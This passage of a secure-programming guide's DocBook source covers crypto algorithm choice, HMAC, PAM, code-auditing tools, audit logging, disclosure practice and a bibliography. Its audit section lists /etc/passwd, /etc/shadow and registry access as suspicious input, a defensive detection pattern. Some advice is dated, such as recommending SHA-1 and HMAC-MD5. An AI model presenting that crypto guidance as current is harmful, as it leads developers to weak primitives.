<!-- http://www.mail-archive.com/cryptography%40wasabisystems.com/msg01950.html -->
In the past, a 1024-bit RSA key was considered reasonably secure, but
recent advancements in factorization algorithms
(e.g., by D. J. Bernstein) have raised concerns that perhaps even 1024 bits
is not enough for an RSA key.
Certainly, if your application needs to be highly secure or last beyond
2015, you should use a 2048 bit keys.
<!--
"1024-bit RSA keys in danger of compromise" by
"Lucky Green" <shamrock@cypherpunks.to>, Bugtraq, 23 March 2002.
D.J. Bernstein paper http://cr.yp.to/papers/nfscircuit.ps
Bruce Schneier doubts it, see
 http://www.counterpane.com/crypto-gram-0203.html#6
-->
</para>

<para>
If you need a public key that requires far fewer bits (e.g., for
a smartcard), then you might use elliptic
curve cryptography (IEEE P1363 has some suggested curves; finding curves
is hard).
However, be careful - elliptic curve cryptography isn't patented, but
certain speedup techniques are patented.
Elliptic curve cryptography is fast enough
that it really doesn't need these speedups anyway for its usual use of
encrypting session / bulk encryption keys.
In general, you shouldn't try to do bulk encryption with elliptic keys;
symmetric algorithms are much faster and are better-tested for the job.
</para>

</sect2>

<sect2 id="hash">
<title>Cryptographic Hash Algorithms</title>

<para>
Some programs need a one-way cryptographic hash algorithm, that is, a function
that takes an ``arbitrary'' amount of data and generates a fixed-length
number that hard for an attacker
to invert (e.g., it's difficult for an attacker to
create a different set of data to generate that same value).
For a number of years MD5 has been a favorite, but recent efforts have
shown that its 128-bit length may not be enough
[van Oorschot 1994]
and that certain attacks weaken MD5's protection
[Dobbertin 1996].
Indeed, there are rumors
that a top industry cryptographer has broken MD5, but is bound by
employee agreement to keep silent
(see the Bugtraq 22 August 2000 posting by John Viega).
Anyone can create a rumor, but enough weaknesses have been found that
the idea of completing the break is plausible.
If you're writing new code, use SHA-1 instead of MD5.
Don't use the original SHA (now called ``SHA-0'');
SHA-0 had the same weakness that MD5 does.
If you need more bits in your hash algorithm, use SHA-256, SHA-384, or
SHA-512; you can get the specifications in NIST FIPS PUB 180-2.
</para>
</sect2>

<sect2 id="integrity-check">
<title>Integrity Checking</title>

<para>
When communicating, you need some sort of integrity check (don't depend
just on encryption, since an attacker can then induce changes of information
to ``random'' values).
This can be done with hash algorithms, but don't just use a hash function
directly (this exposes users to an ``extension'' attack - the attacker
can use the hash value, add data of their choosing, and compute the new hash).
The usual approach is ``HMAC'', which computes the integrity check as
<programlisting>
  H(k xor opad, H(k xor ipad, data)).
</programlisting>
where H is the hash function (typically MD5 or SHA-1) and k is the key.
Thus, integrity checks are often HMAC-MD5 or HMAC-SHA-1.
Note that although MD5 has some weaknesses, as far as I know MD5 isn't
vulnerable when used in this construct, so HMAC-MD5 is (to my knowledge) okay.
This is defined in detail in IETF RFC 2104.
</para>

<para>
Note that in the HMAC approach, a receiver can forge the same data as a sender.
This isn't usually a problem, but if this must be avoided, then use
public key methods and have the sender ``sign'' the data with the sender
private key - this avoids this forging attack, but it's more expensive and
for most environments isn't necessary.
</para>

</sect2>

<sect2 id="rmac">
<title>Randomized Message Authentication Mode (RMAC)</title>

<para>
<ulink url="http://csrc.nist.gov/CryptoToolkit/modes">
NIST has developed and proposed
a new mode</ulink> for using cryptographic algorithms called
<ulink url="http://www.counterpane.com/crypto-gram-0301.html">
Randomized Message Authentication Code (RMAC)</ulink>.
RMAC is intended for use as a message authentication code technique.
</para>

<para>
Although there's a formal proof showing that RMAC is secure, the
proof depends on the highly questionable assumption that
the underlying cryptographic algorithm
meets the "ideal cipher model" - in particular, that the algorithm is
secure against a variety of specialized attacks, including related-key attacks.
Unfortunately, related-key attacks are poorly studied for many algorithms;
this is not the kind of property or attack that most people worry about
when analyzing with cryptographic algorithms.
It's known triple-DES doesn't have this properly, and it's unclear if
other widely-accepted algorithms like AES have this property
(it appears that AES is at least weaker against related key attacks than
usual attacks).
</para>

<para>
The best advice right now is "don't use RMAC".
There are other ways to do message authentication, such as HMAC
combined with a cryptographic hash algorithm (e.g., HMAC-SHA1).
HMAC isn't the same thing (e.g., technically it doesn't include a
nonce, so you should rekey sooner), but the theoretical weaknesses
of HMAC are merely theoretical, while the problems in RMAC seem far
more important in the real world.
</para>
</sect2>

<sect2 id="crypto-other">
<title>Other Cryptographic Issues</title>

<para>
You should both encrypt and include integrity checks of data that's important.
Don't depend on the encryption also providing integrity - an attacker may
be able to change the bits into a different value, and although the attacker
may not be able to change it to a specific value, merely changing the
value may be enough.
In general, you should use different keys for integrity and secrecy, to
avoid certain subtle attacks.
</para>

<para>
One issue not discussed often enough is the problem of ``traffic analysis.''
That is, even if messages are encrypted and the encryption is not broken,
an adversary may learn a great deal just from the encrypted messages.
For example, if the presidents of two companies start exchanging many
encrypted email messages, it may suggest that the two comparies are
considering a merger.
For another example, many SSH implementations have been found to have a
weakness in exchanging passwords: observers could look at packets and
determine the length (or length range) of the password, even if they
couldn't determine the password itself.
They could also determine other information about the password that
significantly aided in breaking it.
<!-- http://lwn.net/2001/0322/a/ssh-analysis.php3 -->
</para>

<para>
Be sure to not make it possible to solve a problem in parts, and use
different keys when the trust environment (who is trusted) changes.
Don't use the same key for too long - after a while, change the session key
or password so an adversary will have to start over.
</para>

<para>
Generally you should compress something you'll encrypt - this does
add a fixed header, which isn't so good, but it eliminates many
patterns in the rest of the message as well as making the result
smaller, so it's usually viewed as a ``win'' if compression is likely
to make the result smaller.
</para>

<para>
In a related note, if you must create your own communication
protocol, examine the problems of what's gone on before.
Classics such as Bellovin [1989]'s review of security problems
in the TCP/IP protocol suite might help you, as well as
Bruce Schneier [1998]
and Mudge's breaking of Microsoft's PPTP implementation and their
follow-on work.
Again, be sure to give any new protocol widespread public review, and
reuse what you can.
</para>
</sect2>

</sect1>


<sect1 id="use-pam">
<title>Using PAM</title>

<para>
Pluggable Authentication Modules (PAM) is
a flexible mechanism for authenticating users.
Many Unix-like systems support PAM, including
Solaris, nearly all Linux distributions
(e.g., Red Hat Linux, Caldera, and Debian as of version 2.2),
and FreeBSD as of version 3.1.
By using PAM, your program can be independent of the
authentication scheme (passwords, SmartCards, etc.).
Basically, your program calls PAM, which at run-time determines
which ``authentication modules'' are required by checking the configuration
set by the local system administrator.
If you're writing a program that requires authentication (e.g., entering
a password), you should include support for PAM.
You can find out more about the Linux-PAM project at
<ulink
url="http://www.kernel.org/pub/linux/libs/pam/index.html">http://www.kernel.org/pub/linux/libs/pam/index.html</ulink>.
</para>

</sect1>


<sect1 id="tools">
<title>Tools</title>

<para>
Some tools may help you detect security problems before
you field the result.
They can't find all such problems, of course, but they can help
catch problems that would overwise slip by.
Here are a few tools, emphasizing open source / free software tools.
</para>

<para>
One obvious type of tool is a program to examine the source code
to search for patterns of known potential security problems
(e.g., calls to library functions in ways are often the source
of security vulnerabilities).
These kinds of programs are called ``source code scanners''.
Here are a few such tools:
<itemizedlist>
<listitem><para>
Flawfinder, which I've developed; it's available at
<ulink url="http://www.dwheeler.com/flawfinder">http://www.dwheeler.com/flawfinder</ulink>.
This is also a program that scans C/C++ source code for common problems,
and is also licensed under the GPL.
Unlike RATS, flawfinder is implemented in Python.
The developers of RATS and Flawfinder have agreed to find a way to
work together to create a single ``best of breed'' open source program.
</para></listitem>
<listitem><para>
RATS (Rough Auditing Tool for Security)
from Secure Software Solutions is available at
<ulink url="http://www.securesw.com/rats">http://www.securesw.com/rats</ulink>.
This program scans C/C++ source code for common problems, and
is licensed under the GPL.
</para></listitem>
<listitem><para>
ITS4 from Cigital (formerly Reliable Software Technologies, RST)
also statically checks C/C++ code.
It is available free for non-commercial use, including its source code
and with certain modification and redistribution rights.
Note that this isn't released as ``open source'' as defined by the
<ulink url="http://www.opensource.org/osd.html">Open
Source Definition</ulink> (OSD) -
In particular, OSD point 6 forbids
``non-commercial use only'' clauses in open source licenses.
ITS4 is available at
<ulink url="http://www.rstcorp.com/its4">http://www.rstcorp.com/its4</ulink>.
</para></listitem>
<listitem><para>
Splint (formerly named LCLint) is a tool for statically checking C programs.
With minimal effort, splint can be used as a better lint.
If additional effort is invested adding annotations to programs,
splint can perform stronger checking than can be done by any standard lint.
For example, it can be used to statically detect likely buffer overflows.
The software is licensed under the GPL and is available at
<ulink url="http://www.splint.org">http://www.splint.org</ulink>.
<!-- <ulink url="http://lclint.cs.virginia.edu">http://lclint.cs.virginia.edu</ulink>.
-->
</para></listitem>
<listitem><para>
cqual is a type-based analysis tool for finding bugs in C programs. cqual
extends the type system of C with extra user-defined type qualifiers,
e.g., it can note that values are ``tainted'' or ``untainted''
(similar to Perl's taint checking). The
programmer annotates their program in a few places, and cqual performs
qualifier inference to check whether the annotations are correct. cqual
presents the analysis results using Program Analysis Mode, an emacs-based
interface.
The current version of cqual can detect potential format-string
vulnerabilities in C programs.
A previous incarnation of cqual, Carillon,
has been used to find Y2K bugs in C programs.
The software is licensed under the GPL and is available from
<ulink url="http://www.cs.berkeley.edu/Research/Aiken/cqual">http://www.cs.berkeley.edu/Research/Aiken/cqual</ulink>.
</para></listitem>

<listitem><para>
Cyclone is a C-like language intended to remove C's security weaknesses.
In theory, you can always switch to a language that is ``more secure,''
but this doesn't always help (a language can help you avoid common mistakes
but it can't read your mind).
<ulink url="http://www.securityfocus.com/guest/9094">John Viega has
reviewed Cyclone</ulink>, and in December 2001 he said:
``Cyclone is definitely a neat language.
It's a C dialect that doesn't feel like it's taking away any power,
yet adds strong safety guarantees, along with numerous features that
can be a real boon to programmers.
Unfortunately, Cyclone isn't yet ready for prime time.
Even with crippling limitations aside, it doesn't yet offer
enough advantages over Java (or even C with a good set of tools)
to make it worth the risk of using what is still a very young technology.
Perhaps in a few years, Cyclone will mature into a robust,
widely supported language that comes dangerously
close to C in terms of efficiency.
If that day comes, you'll certainly see me abandoning C for good.''
The Cyclone compiler has been released under the GPL and LGPL.
You can get more information from the
<ulink url="http://www.research.att.com/projects/cyclone">
Cyclone web site</ulink>.
</para></listitem>
</itemizedlist>
</para>

<para>
Some tools try to detect potential security flaws at run-time,
either to counter them or at least to warn the developer about them.
Much of Crispen Cowan's work, such as StackGuard, fits here.
</para>

<para>
There are several tools that try to detect various C/C++ memory-management
problems; these are really general-purpose software quality improvement
tools, and not specific to security, but memory management problems
can definitely cause security problems.
An especially capable tool is
<ulink url="http://developer.kde.org/~sewardj">Valgrind</ulink>,
which detects various memory-management problems
(such as use of uninitialized memory, reading/writing memory after it's been
free'd, reading/writing off the end of malloc'ed blocks,
and memory leaks).
Another such tool is Electric Fence (efence) by Bruce Perens, which can
detect certain memory management errors.
<ulink url="http://www.linkdata.se/sourcecode.html">Memwatch</ulink>
(public domain) and
<ulink url="http://odin.ac.hmc.edu/~neldredge/yamd/">YAMD</ulink> (GPL)
can detect memory allocation problems for C and C++.
You can even use the built-in capabilities of the
GNU C library's malloc library, which has the
MALLOC_CHECK_ environment variable (see its manual page for more information).
There are many others.
</para>


<para>
Another approach is to create test patterns and run the program,
in attempt to find weaknesses in the program.
Here are a few such tools:
<itemizedlist>
<listitem><para>
BFBTester, the Brute Force Binary Tester, is licensed under the GPL.
This program does quick security checks of binary programs.
BFBTester performs checks of single and multiple argument
command line overflows and environment variable overflows.
Version 2.0 and higher can also watch for tempfile creation activity
(to check for using unsafe tempfile names).
At one time BFBTester didn't run on Linux (due to
a technical issue in Linux's POSIX threads implementation), but this
has been fixed as of version 2.0.1.
More information is available at
<ulink url="http://bfbtester.sourceforge.net/">http://bfbtester.sourceforge.net/</ulink>
</para></listitem>

<listitem><para>
The
<ulink url="http://fuzz.sourceforge.net">fuzz</ulink>
program
is a tool for testing other software.
It tests programs by bombarding the program being evaluated with random data.
This tool isn't really specific to security.
</para></listitem>

<listitem><para>
<ulink url="http://www.immunitysec.com/spike.html">SPIKE</ulink>
is a "fuzzer creation kit", i.e., it's a toolkit designed to
create "random" tests to find security problems.
The SPIKE toolkit is particularly designed for protocol analysis by
simulating network protocol clients, and SPIKE proXy is a tool built on
SPIKE to test web applications.
SPIKE includes a few pre-canned tests.
SPIKE is licensed under the GPL.
</para></listitem>

</itemizedlist>
</para>

<para>
There are a number tools that try to give you insight into running
programs that can also be useful when trying to find security problems
in your code.
This includes symbolic debuggers (such as gdb) and trace programs
(such as strace and ltrace).
One interesting program to support analysis of running code is
<ulink url="http://razor.bindview.com/tools/fenris">
Fenris</ulink> (GPL license).
Its documentation describes Fenris as a
``multipurpose tracer, stateful analyzer and partial decompiler
intended to simplify bug tracking,
security audits, code, algorithm or protocol analysis -
providing a structural program trace, general information
about internal constructions, execution path,
memory operations, I/O, conditional expressions and much more.''
Fenris actually supplies a whole suite of tools, including
extensive forensics capabilities and
<ulink url="http://lcamtuf.coredump.cx/fdesk.jpg">a
nice debugging GUI for Linux</ulink>.
A list of other promising open source tools that can be suitable
for debugging or code analysis is available at
<!-- was: http://lcamtuf.coredump.cx/fenris/other.txt -->
<ulink url="http://lcamtuf.coredump.cx/fenris/debug-tools.html">
http://lcamtuf.coredump.cx/fenris/debug-tools.html</ulink>.
Another interesting program along these lines is Subterfugue,
which allows you to control what happens in every system call made
by a program.
</para>

<para>
If you're building a common kind of product where many standard
potential flaws exist (like an ftp server or firewall), you might
find standard security scanning tools useful.
One good one is
<ulink url="http://www.nessus.org">Nessus</ulink>; there are many others.
These kinds of tools are very useful for doing regression testing,
but since they essentially use a list of past specific vulnerabilities
and common configuration errors,
they may not be very helpful in finding problems in new programs.
</para>

<para>
Often, you'll need to call on other tools to implement your secure
infrastructure.
The
<ulink url="http://ospkibook.sourceforge.net">
Open-Source PKI Book</ulink>
describes a number of open source programs for
implmenting a public key infrastructure (PKI).
</para>

<para>
Of course, running a ``secure'' program on an insecure platform
configuration makes little sense.
You may want to examine hardening systems, which attempt to configure
or modify systems to be more resistant to attacks.
For Linux, one hardening system is
Bastille Linux, available at
<ulink url="http://www.bastille-linux.org">http://www.bastille-linux.org</ulink>.
</para>


</sect1>
<sect1 id="windows-ce">
<title>Windows CE</title>

<para>
If you're securing a Windows CE Device, you should read
Maricia Alforque's
"Creating a Secure Windows CE Device" at
<ulink url="http://msdn.microsoft.com/library/techart/winsecurity.htm">http://msdn.microsoft.com/library/techart/winsecurity.htm</ulink>.
</para>
</sect1>

<sect1 id="write-audit-records">
<title>Write Audit Records</title>

<para>
Write audit logs for program startup, session startup, and
for suspicious activity.
Possible information of value includes date, time, uid, euid, gid, egid,
terminal information, process id, and command line values.
You may find the function syslog(3) helpful for implementing audit logs.
One awkward problem is that any logging system should be able to record
a lot of information (since this information could be very helpful), yet
if the information isn't handled carefully the information itself could be
used to create an attack.
After all, the attacker controls some of the input being sent to the program.
When recording data sent by a possible attacker,
identify a list of ``expected'' characters and
escape any ``unexpected'' characters so that the log isn't corrupted.
Not doing this can be a real problem; users may include characters
such as control characters (especially NIL or end-of-line) that
can cause real problems.
For example, if an attacker embeds a newline, they can then forge
log entries by following the newline with the desired log entry.
Sadly, there doesn't seem to be a standard convention for escaping these
characters.
I'm partial to the URL escaping mechanism
(%hh where hh is the hexadecimal value of the escaped byte) but there
are others including the C convention (\ooo for the octal value and \X
where X is a special symbol, e.g., \n for newline).
There's also the caret-system (^I is control-I), though that doesn't
handle byte values over 127 gracefully.
</para>

<para>
There is the danger that a user could create a denial-of-service attack
(or at least stop auditing)
by performing a very large number of events that cut an audit record until
the system runs out of resources to store the records.
One approach to counter to this threat is to rate-limit audit record
recording; intentionally slow down the response rate
if ``too many'' audit records are being cut.
You could try to slow the response rate only to the suspected attacker,
but in many
situations a single attacker can masquerade as potentially many users.
</para>

<para>
Selecting what is ``suspicious activity'' is, of course, dependent on
what the program does and its anticipated use.
Any input that fails the filtering checks discussed earlier is
certainly a candidate (e.g., containing NIL).
Inputs that could not result from normal use should probably be logged,
e.g., a CGI program where certain required fields are missing
in suspicious ways.
Any input with phrases like /etc/passwd or /etc/shadow
or the like is very suspicious in many cases.
Similarly, trying to access Windows ``registry'' files or .pwl files
is very suspicious.
</para>

<para>
Do not record passwords in an audit record.
Often people accidentally enter passwords for a different system,
so recording a password may allow a system administrator to break into a
different computer outside the administrator's domain.
</para>
</sect1>

<sect1 id="physical-emissions">
<title>Physical Emissions</title>
<para>
Although it's really outside the scope of this book, it's
important to remember that computing and communications equipment leaks a lot
information that makes them hard to really secure.
Many people are aware of TEMPEST requirements which deal with
radio frequency emissions of computers, displays, keyboards, and other
components which can be eavesdropped.
The light from displays can also be eavesdropped, even if it's bounced off an
office wall at great distance
[Kuhn 2002].
Modem lights are also enough to determine the underlying communication.
</para>
</sect1>

<sect1 id="miscellaneous">
<title>Miscellaneous</title>

<para>
The following are miscellaneous security guidelines that I couldn't
seem to fit anywhere else:
</para>

<para>
Have your program check at least some of its assumptions before it uses them
(e.g., at the beginning of the program).
For example, if you depend on the ``sticky'' bit being set on a given
directory, test it; such tests take little time and could prevent
a serious problem.
If you worry about the execution time of some tests on each call, at least
perform the test at installation time, or even better at least
perform the test on application start-up.
</para>

<para>
If you have a built-in scripting language, it may be possible for the
language to set an environment variable which adversely affects the
program invoking the script.
Defend against this.
</para>

<para>
If you need a complex configuration language,
make sure the language has a comment
character and include a number of commented-out secure examples.
Often '&num;' is used for commenting, meaning ``the rest
of this line is a comment''.
</para>

<para>
If possible, don't create setuid or setgid root programs;
make the user log in as root instead.
</para>

<para>
Sign your code. That way, others can check to see if what's available
was what was sent.
</para>

<para>
In some applications you may need to worry about timing attacks,
where the variation in timing or CPU utilitization is enough to give
away important information.
This kind of attack has been used to obtain keying information from
Smartcards, for example.
Mauro Lacy has
published a paper titled
<ulink url="http://maurol.com.ar/security/RTT.pdf">Remote Timing Techniques</ulink>,
showing that you can (in some cases) determine over an Internet
whether or not a given user id exists, simply from the effort expended
by the CPU
(which can be detected remotely using techniques described in the paper).
The only way to deal with these sorts of problems is to make sure that
the same effort is performed even when it isn't necessary.
The problem is that in some cases this may make the system more vulnerable
to a denial of service attack, since it can't optimize away unnecessary work.
</para>

<para>
Consider statically linking secure programs.
This counters attacks on the dynamic link library mechanism
by making sure that the secure programs don't use it.
There are several downsides to this however.
This is likely to increase disk and memory use (from multiple copies of the
same routines).
Even worse, it makes updating of libraries
(e.g., for security vulnerabilities) more difficult - in most systems
they won't be automatically updated and have to be tracked and
implemented separately.
</para>

<para>
When reading over code, consider all the cases where a match is not made.
For example, if there is a switch statement, what happens when none of the
cases match?
If there is an ``if'' statement, what happens when the condition is false?
</para>

<para>
Merely ``removing'' a file doesn't eliminate the file's data from a disk;
on most systems this simply marks the content as ``deleted'' and makes it
eligible for later reuse, and often data is at least temporarily stored
in other places (such as memory, swap files, and temporary files).
Indeed, against a determined attacker, writing over the data isn't enough.
A classic paper on the problems of erasing magnetic media is
Peter Gutmann's paper
<ulink url="http://www-tac.cisco.com/Support_Library/field_alerts/fn13070.html">
``Secure Deletion of Data from Magnetic and Solid-State Memory''</ulink>.
A determined adversary can use other means, too, such as monitoring
electromagnetic emissions from computers (military systems have to obey
TEMPEST rules to overcome this)
and/or surreptitious attacks (such as monitors hidden in keyboards).
</para>

<para>
When fixing a security vulnerability,
consider adding a ``warning'' to detect and log an attempt to
exploit the (now fixed) vulnerability.
This will reduce the likelihood of an attack, especially if there's
no way for an attacker to predetermine if the attack will work,
since it exposes an attack in progress.
In short, it turns a vulnerability into an intrusion detection system.
This also suggests that exposing the version of a server program
before authentication is usually a bad idea for security, since doing so
makes it easy for an attacker to only use attacks that would work.
Some programs make it possible for users to intentionally ``lie'' about their
version, so that attackers will use the ``wrong attacks'' and be detected.
Also, if the vulnerability can be triggered over a network, please make
sure that security scanners can detect the vulnerability.
I suggest contacting Nessus
(<ulink url="http://www.nessus.org">http://www.nessus.org</ulink>)
and make sure that their open source security scanner can detect the
problem.
That way, users who don't check their software for upgrades
will at least learn about the problem during their security vulnerability
scans (if they do them as they should).
</para>

<para>
Always include in your documentation contact information for
where to report security problems.
You should also support at least one of the common email addresses
for reporting security problems
(security-alert@SITE, secure@SITE, or security@SITE);
it's often good to have support@SITE and info@SITE working as well.
Be prepared to support industry practices by those who have a security
flaw to report, such as the
<ulink url="http://www.wiretrip.net/rfp/policy.html">
Full Disclosure Policy (RFPolicy)
</ulink>
and the IETF Internet draft,
``Responsible Vulnerability Disclosure Process''.
<!--
http://www.ietf.org/internet-drafts/draft-christey-wysopal-vuln-disclosure-00.txt
http://slashdot.org/article.pl?sid=02/02/21/0559238&mode=thread&tid=9.4
-->
It's important to quickly work with anyone who
is reporting a security flaw; remember that they are doing you a favor
by reporting the problem to you, and that they are under no obligation
to do so.
It's especially important, once the problem is fixed, to give proper credit
to the reporter of the flaw (unless they ask otherwise).
Many reporters provide the information solely to gain the credit,
and it's generally accepted that credit is owed to the reporter.
Some vendors argue that people should never report vulnerabilities to the
public; the problem with this argument is that this was once common, and the
result was vendors who denied vulnerabilities while their customers were
getting constantly subverted for years at a time.
</para>

<!-- ??? maybe someday add Logging discussion -->

<para>
Follow best practices and common conventions when leading a
software development project.
If you are leading an open source software / free software project,
some useful guidelines can be found in
<ulink url="http://www.tldp.org/HOWTO/Software-Proj-Mgmt-HOWTO/index.html">
Free Software Project Management HOWTO</ulink> and
<ulink url="http://www.tldp.org/HOWTO/Software-Release-Practice-HOWTO/index.html">
Software Release Practice HOWTO</ulink>;
you should also read
<ulink url="http://www.catb.org/~esr/writings/cathedral-bazaar">
The Cathedral and the Bazaar</ulink>.
</para>

<para>
Every once in a while, review security guidelines like this one.
At least re-read the conclusions in <xref linkend="conclusion">,
and feel free to go back to the introduction
(<xref linkend="introduction">) and start again!
</para>


</sect1>


</chapter>


<chapter id="conclusion">
<title>Conclusion</title>

<epigraph>
<attribution>Ecclesiastes 7:8 (NIV)</attribution>
<para>
The end of a matter is better than its beginning, and
patience is better than pride.
</para>
</epigraph>

<para>
Designing and implementing a truly secure program
is actually a difficult task on Unix-like systems such as Linux and Unix.
The difficulty is that a truly secure program must respond
appropriately to all possible inputs and environments
controlled by a potentially hostile user.
Developers of secure programs must deeply understand their platform,
seek and use guidelines (such as these), and then use assurance
processes (such as inspections and other peer review techniques)
to reduce their programs' vulnerabilities.
</para>

<para>
In conclusion, here are some of the key guidelines in this book:

<itemizedlist>
<listitem>

<para>
Validate all your inputs, including command line inputs,
environment variables, CGI inputs, and so on.
Don't just reject ``bad'' input; define what is an ``acceptable'' input
and reject anything that doesn't match.
</para>
</listitem>
<listitem>

<para>
Avoid buffer overflow.
Make sure that long inputs (and long intermediate data values) can't
be used to take over your program.
This is the primary programmatic error at this time.
</para>
</listitem>
<listitem>

<para>
Structure program internals.
Secure the interface, minimize privileges, make the initial configuration
and defaults safe, and fail safe.
Avoid race conditions (e.g., by safely opening any files in a shared
directory like /tmp).
Trust only trustworthy channels
(e.g., most servers must not trust their clients for security checks or
other sensitive data such as an item's price in a purchase).
</para>
</listitem>
<listitem>

<para>
Carefully call out to other resources.
Limit their values to valid values (in particular be concerned about
metacharacters), and check all system call return values.
</para>
</listitem>
<listitem>

<para>
Reply information judiciously.
In particular, minimize feedback, and handle full or unresponsive output
to an untrusted user.
</para>
</listitem>

</itemizedlist>

</para>

</chapter>

<chapter id="bibliography">
<title>Bibliography</title>

<epigraph>
<attribution>Ecclesiastes 12:11-12 (NIV)</attribution>
<para>
The words of the wise are like goads, their collected sayings like
firmly embedded nails--given by one Shepherd.
Be warned, my son, of anything in addition to them.
Of making many books there is no end, and much study wearies the body.
</para>
</epigraph>

<para>
<emphasis remap="it">Note that there is a heavy
emphasis on technical articles available on the web, since this is where
most of this kind of technical information is available.</emphasis>
</para>

<para>
[Advosys 2000]
Advosys Consulting
(formerly named Webber Technical Services).
<emphasis remap="it">Writing Secure Web Applications</emphasis>.
<ulink url="http://advosys.ca/tips/web-security.html">http://advosys.ca/tips/web-security.html</ulink>
<!-- was http://www.webbertech.com/tips/web-security.html -->
</para>

<para>
[Al-Herbish 1999]
Al-Herbish, Thamer.
1999.
<emphasis remap="it">Secure Unix Programming FAQ</emphasis>.
<ulink
url="http://www.whitefang.com/sup">http://www.whitefang.com/sup</ulink>.
</para>

<para>
[Aleph1 1996]
Aleph1.
November 8, 1996.
``Smashing The Stack For Fun And Profit''.
<emphasis remap="it">Phrack Magazine</emphasis>.
Issue 49, Article 14.
<!-- ???: may need to double-escape the ampersand here. -->
<ulink
url="http://www.phrack.com/search.phtml?view&amp;article=p49-14">http://www.phrack.com/search.phtml?view&amp;article=p49-14</ulink>
or alternatively
<ulink
url="http://www.2600.net/phrack/p49-14.html">http://www.2600.net/phrack/p49-14.html</ulink>.
</para>

<para>
[Anonymous 1999]
Anonymous.
October 1999.
Maximum Linux Security:
A Hacker's Guide to Protecting Your Linux Server and Workstation
Sams.
ISBN: 0672316706.
</para>

<para>
[Anonymous 1998]
Anonymous.
September 1998.
Maximum Security : A Hacker's Guide to Protecting Your
Internet Site and Network.
Sams.
Second Edition.
ISBN: 0672313413.
</para>

<para>
[Anonymous Phrack 2001]
Anonymous.
August 11, 2001.
Once upon a free().
Phrack, Volume 0x0b, Issue 0x39, Phile #0x09 of 0x12.
<ulink url="http://phrack.org/show.php?p=57&amp;a=9">
http://phrack.org/show.php?p=57&amp;a=9
</ulink>
</para>

<para>
[AUSCERT 1996]
Australian Computer Emergency Response Team (AUSCERT) and O'Reilly.
May 23, 1996 (rev 3C).
<emphasis remap="it">A Lab Engineers Check List for Writing Secure Unix Code</emphasis>.
<ulink
url="ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist">ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist</ulink>
</para>

<para>
[Bach 1986]
Bach, Maurice J.
1986.
<emphasis remap="it">The Design of the Unix Operating System</emphasis>.
Englewood Cliffs, NJ: Prentice-Hall, Inc.
ISBN 0-13-201799-7 025.
</para>

<para>
[Beattie 2002]
Beattie, Steve, Seth Arnold, Crispin Cowan, Perry Wagle, Chris Wright,
Adam Shostack.
November 2002.
Timing the Application of Security Patches for Optimal Uptime.
2002 LISA XVI, November 3-8, 2002, Philadelphia, PA.
</para>

<para>
[Bellovin 1989]
Bellovin, Steven M.
April 1989.
"Security Problems in the TCP/IP Protocol Suite"
Computer Communications Review 2:19, pp. 32-48.
<ulink
url="http://www.research.att.com/~smb/papers/ipext.pdf">http://www.research.att.com/~smb/papers/ipext.pdf</ulink>
</para>

<para>
[Bellovin 1994]
Bellovin, Steven M.
December 1994.
<emphasis remap="it">Shifting the Odds -- Writing (More) Secure Software</emphasis>.
Murray Hill, NJ: AT&amp;T Research.
<ulink
url="http://www.research.att.com/~smb/talks">http://www.research.att.com/~smb/talks</ulink>
</para>

<para>
[Bishop 1996]
Bishop, Matt.
May 1996.
``UNIX Security: Security in Programming''.
<emphasis remap="it">SANS '96</emphasis>. Washington DC (May 1996).
<ulink
url="http://olympus.cs.ucdavis.edu/~bishop/secprog.html">http://olympus.cs.ucdavis.edu/~bishop/secprog.html</ulink>
</para>

<para>
[Bishop 1997]
Bishop, Matt.
October 1997.
``Writing Safe Privileged Programs''.
<emphasis remap="it">Network Security 1997</emphasis>
New Orleans, LA.
<ulink
url="http://olympus.cs.ucdavis.edu/~bishop/secprog.html">http://olympus.cs.ucdavis.edu/~bishop/secprog.html</ulink>
</para>

<para>
[Blaze 1996]
Blaze, Matt, Whitfield Diffie, Ronald L. Rivest, Bruce Schneier,
Tsutomu Shimomura, Eric Thompson, and Michael Wiener.
January 1996.
``Minimal Key Lengths for Symmetric Ciphers to Provide
Adequate Commercial Security:
A Report by an Ad Hoc Group of Cryptographers and Computer Scientists.''
<ulink url="ftp://ftp.research.att.com/dist/mab/keylength.txt">
ftp://ftp.research.att.com/dist/mab/keylength.txt</ulink> and
<ulink url="ftp://ftp.research.att.com/dist/mab/keylength.ps">ftp://ftp.research.att.com/dist/mab/keylength.ps</ulink>.
</para>

<para>
[CC 1999]
<emphasis remap="it">The Common Criteria for Information Technology Security Evaluation
(CC)</emphasis>.
August 1999.
Version 2.1.
Technically identical to International Standard ISO/IEC 15408:1999.
<ulink
url="http://csrc.nist.gov/cc/ccv20/ccv2list.htm">http://csrc.nist.gov/cc/ccv20/ccv2list.htm</ulink>
</para>

<para>
[CERT 1998]
Computer Emergency Response Team (CERT) Coordination Center (CERT/CC).
February 13, 1998.
<emphasis remap="it">Sanitizing User-Supplied Data in CGI Scripts</emphasis>.
CERT Advisory CA-97.25.CGI&lowbar;metachar.
<ulink
url="http://www.cert.org/advisories/CA-97.25.CGI_metachar.html">http://www.cert.org/advisories/CA-97.25.CGI_metachar.html</ulink>.
</para>

<para>
[Cheswick 1994]
Cheswick, William R. and Steven M. Bellovin.
Firewalls and Internet Security: Repelling the Wily Hacker.
Full text at
<ulink url="http://www.wilyhacker.com">
http://www.wilyhacker.com</ulink>.
</para>

<para>
[Clowes 2001]
Clowes, Shaun.
2001.
``A Study In Scarlet - Exploiting Common Vulnerabilities in PHP''
<ulink url="http://www.securereality.com.au/archives.html">http://www.securereality.com.au/archives.html</ulink>
</para>


<para>
[CMU 1998]
Carnegie Mellon University (CMU).
February 13, 1998
Version 1.4.
``How To Remove Meta-characters From User-Supplied Data In CGI Scripts''.
<ulink
url="ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters">ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters</ulink>.
</para>

<para>
[Cowan 1999]
Cowan, Crispin, Perry Wagle, Calton Pu, Steve Beattie, and
Jonathan Walpole.
``Buffer Overflows: Attacks and Defenses for the Vulnerability
of the Decade''.
Proceedings of DARPA Information Survivability Conference and Expo (DISCEX),
<ulink
url="http://schafercorp-ballston.com/discex">http://schafercorp-ballston.com/discex</ulink>
SANS 2000.
<ulink
url="http://www.sans.org/newlook/events/sans2000.htm">http://www.sans.org/newlook/events/sans2000.htm</ulink>.
For a copy, see
<ulink
url="http://immunix.org/documentation.html">http://immunix.org/documentation.html</ulink>.
</para>

<para>
[Cox 2000]
Cox, Philip.
